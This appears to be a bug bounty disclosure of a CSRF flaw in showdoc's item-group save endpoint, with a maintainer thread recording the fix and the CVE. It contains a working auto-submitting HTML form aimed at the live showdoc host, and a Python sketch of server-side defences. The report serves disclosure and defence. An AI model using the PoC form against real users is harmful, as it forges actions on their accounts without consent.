Cross-Site Request Forgery (CSRF) in star7th/showdoc

Valid

Reported on

Nov 21st 2021


Description

An attacker can create a new item group on behalf of a logged-in user simply by getting that user to visit the attacker's website. Furthermore, the user's id ("uid") is exposed in the JSON response.

The CSRF protection can be bypassed by placing the payload in an iframe or a standalone HTML file and sending it to the victim.

Proof of Concept

PoC.html

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://www.showdoc.com.cn/server/index.php?s=/api/itemGroup/save" method="POST">
      <input type="hidden" name="group_name" value="testcsrf" />
      <input type="hidden" name="id" value="" />
      <input type="hidden" name="item_ids" value="1704644990568304" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Steps to Reproduce

1. Open PoC.html in any browser while logged in to showdoc.
2. Check that a new group named testcsrf has been created and that the item with id=1704644990568304 has been added to it.
Furthermore, the user id uid is also exposed via the JSON response:

{"error_code":0,"data":{"id":"2002","uid":"359287","group_name":"testcsrf","item_ids":"1704644990568304","s_number":"0","created_at":"2021-11-21 12:10:25","updated_at":"2021-11-21 12:10:25"}}
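Defender's view of the two findings above (a cross-site POST that rides on the victim's session cookie, and the uid echoed back in the response), as an added example that is not part of this report or of showdoc's own PHP code base: a Python sketch of the server-side checks that stop the PoC. It assumes the session cookie name PHPSESSID, a hypothetical csrf_token form field, and constructed request headers, form bodies and session data; the SameSite=Strict cookie attribute is the mitigation the maintainer describes later in the thread, and the Origin/token check is defence in depth on top of it.

```python
import hmac
import secrets
from http.cookies import SimpleCookie
from urllib.parse import urlsplit

# Origin the PoC form posts to (taken from the report).
APP_ORIGIN = "https://www.showdoc.com.cn"
# Assumed session cookie name (showdoc is PHP; PHPSESSID is the usual default).
SESSION_COOKIE = "PHPSESSID"


def issue_session_cookie(session_id: str) -> str:
    """Set-Cookie value for the session cookie with SameSite=Strict.

    With Strict, the browser sends this cookie only on same-site requests, so the
    form that PoC.html auto-submits from the attacker's origin arrives with no
    session at all and /api/itemGroup/save sees an unauthenticated request.
    """
    jar = SimpleCookie()
    jar[SESSION_COOKIE] = session_id
    jar[SESSION_COOKIE]["secure"] = True
    jar[SESSION_COOKIE]["httponly"] = True
    jar[SESSION_COOKIE]["samesite"] = "Strict"
    return jar.output(header="").strip()


def new_csrf_token() -> str:
    """Per-session synchronizer token, stored server side and embedded in forms."""
    return secrets.token_urlsafe(32)


def origin_allowed(headers: dict) -> bool:
    """Accept a state-changing request only if Origin (or Referer, when Origin is
    absent) names the application's own origin. A sandboxed iframe sends
    Origin: null, which fails the comparison as well."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == APP_ORIGIN


def csrf_check(headers: dict, form: dict, session: dict) -> bool:
    """Guard for POST /api/itemGroup/save: origin check plus a constant-time
    comparison of the submitted token with the token stored in the session."""
    if not origin_allowed(headers):
        return False
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token")
    if not expected or not supplied:
        return False
    return hmac.compare_digest(expected.encode(), supplied.encode())


def redact_response(payload: dict) -> dict:
    """Drop the internal user id from the JSON body returned to the caller; the
    report shows "uid" being echoed back alongside the new group."""
    data = dict(payload.get("data", {}))
    data.pop("uid", None)
    return {**payload, "data": data}


# Constructed sample data (not captured from showdoc).
SESSION = {"uid": "359287", "csrf_token": new_csrf_token()}

# What the browser sends when PoC.html auto-submits from the attacker's page:
# the attacker's Origin and no token, because that page cannot read one.
FORGED_HEADERS = {"Origin": "https://attacker.example"}
FORGED_FORM = {"group_name": "testcsrf", "id": "", "item_ids": "1704644990568304"}

# The same request issued by showdoc's own UI, carrying the session's token.
LEGIT_HEADERS = {"Origin": APP_ORIGIN}
LEGIT_FORM = {**FORGED_FORM, "csrf_token": SESSION["csrf_token"]}

# Shape of the response body quoted in the report, before redaction.
RAW_RESPONSE = {"error_code": 0,
                "data": {"id": "2002", "uid": "359287", "group_name": "testcsrf"}}

if __name__ == "__main__":
    print("forged request accepted:", csrf_check(FORGED_HEADERS, FORGED_FORM, SESSION))
    print("legit request accepted: ", csrf_check(LEGIT_HEADERS, LEGIT_FORM, SESSION))
    print(issue_session_cookie("constructedsessionid"))
    print(redact_response(RAW_RESPONSE))
```

The token check matters even with SameSite=Strict in place: older browsers ignore the attribute, and a same-site but attacker-controlled page (for example user-supplied HTML served from the same registrable domain) would still get the cookie, whereas it can never read the per-session token.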

Video PoC

You can check my video PoC here: PoC

Impact

This can result in the exposure of data or unintended code execution.

We are processing your report and will contact the star7th/showdoc team within 24 hours. 13 days ago
Chau Minh Khanh modified their report
13 days ago
Chau Minh Khanh modified their report
13 days ago
We have contacted a member of the star7th/showdoc team and are waiting to hear back 12 days ago
star7th
12 days ago

Maintainer


There is already another report on this issue. Therefore, I have added the Strict flag to the cookie. You can retest whether the problems you mentioned still exist.

Chau Minh Khanh
12 days ago

Researcher


Hi @star7th,

I can confirm that you added the Strict flag in your fix as mentioned in the other report. I retested and saw that the CSRF vulnerability described in the reproduction steps above is no longer exploitable.

However, you can see that my vulnerability was reported earlier, and moreover the CSRF vulnerability in my report exists in a different endpoint, /api/itemGroup/save. It is related to Project Group management, not Team management as in the other report.

We have sent a follow up to the star7th/showdoc team. We will try again in 7 days. 9 days ago
star7th validated this vulnerability 9 days ago
Chau Minh Khanh has been awarded the disclosure bounty
The fix bounty is now up for grabs
star7th confirmed that a fix has been merged on 654e87 9 days ago
star7th has been awarded the fix bounty
Jamie Slome
3 days ago

Admin


CVE published! 🎊

Chau Minh Khanh
3 days ago

Researcher


Thank you for your support! @admin